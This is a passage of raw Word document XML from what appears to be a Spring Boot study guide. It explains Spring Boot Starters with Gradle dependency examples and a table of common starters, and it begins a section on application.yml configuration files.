          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C0811" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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stead of manually including multiple libraries, Spring Boot Starters bundle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common dependencies together</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, following the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"convention over configuration"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE6E3C" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C81C6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780183">
          <v:rect id="_x0000_i2487" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337C998" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C62">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y Use Starters?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D7EE0" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Reduces boilerplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in build.gradle or pom.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683902C2" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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utomatically brings in compatible versions of libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BC3D6" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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eeds up development and setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004D025" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C81C6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1DEAB66">
          <v:rect id="_x0000_i2488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B1E864" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C62">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spring-boot-starter-web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D3313" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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Instead of this </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A1523" w14:textId="77777777" w:rsidR="00B6073B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607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0044258"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework:spring-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59A8C5" w14:textId="77777777" w:rsidR="00B6073B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607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0044258"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework.boot:spring-boot'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC6B3A" w14:textId="77777777" w:rsidR="00B6073B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607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0044258"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'com.fasterxml.jackson.core:jackson-databind'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57289DF4" w14:textId="211C235C" w:rsidR="00B6073B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607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0044258"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework.boot:spring-boot-starter-tomcat'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE31FD" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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ust use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B5008A" w14:textId="1E7C1D79" w:rsidR="00B6073B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607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068594"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework.boot:spring-boot-starter-web'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F7978" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3A3FE" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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MVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A73857" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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mbedded Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38293F1E" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ckson for JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21672FC0" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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gging (SLF4J + Logback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FA807" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C81C6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662335B">
          <v:rect id="_x0000_i2489" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFDCEC4" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C62">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mmon Spring Boot Start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55"/>
        <w:gridCol w:w="4572"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="71593DF2" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF1EDDA" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00B6073B">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tarter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="583E83F5" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00B6073B">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C81C62" w:rsidRPr="00CE4B95" w14:paraId="78070E81" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07AA54FE" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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boot-starter-web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C8B534A" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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building web &amp; RESTful apps using Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="5CAC9124" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C455C9" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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boot-starter-data-jpa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="241BE1A7" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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 JPA &amp; Hibernate-based database access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="4A902DAF" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63490B3C" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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boot-starter-security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0440F1FD" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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dds Spring Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="10D23075" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="183563F3" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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boot-starter-test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53481ECB" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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esting libraries (JUnit, Mockito, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="2757A2B6" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A99C2C1" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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boot-starter-thymeleaf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D1668B" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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emplate engine for web views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="00F5F3F0" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6809ED24" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C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boot-starter-actuator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FDB73CA" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C6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nitoring and metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="769BF2B6" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C81C6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05918F4">
          <v:rect id="_x0000_i2490" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB169F" w14:textId="1212A1FA" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C81C62">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t>
      </w:r>
      <w:r w:rsidR="00434DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5FA35C" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00944A46">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l starters follow the naming convention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>spring-boot-starter-&lt;feature&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530AD2D8" w14:textId="77777777" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C81C6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51F1BE2">
          <v:rect id="_x0000_i2491" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631811C" w14:textId="798EC3EC" w:rsidR="00010198" w:rsidRPr="00CE4B95" w:rsidRDefault="00010198">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="_Toc196308051"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a yaml file in SpringBoot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:p w14:paraId="28E88A3C" w14:textId="46B5CCA8" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00C60351">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Spring Boot, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>YAML file</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (application.yml) is an alternative to the traditional application.properties file. It's used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hierarchical and readable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BDC69" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00764E9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BAD0832">
          <v:rect id="_x0000_i2492" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13A652" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90" w:rsidP="00764E90">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y YAML?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E09380" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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eaner and more structured than properties files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8744C7" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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upports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nested configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, arrays, and environment profiles more elegantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6677BC" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00764E90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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sier to maintain for complex settings (like multiple data sources, Kafka, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C585D" w14:textId="77777777" w:rsidR="00764E90" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00764E9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82022EE">
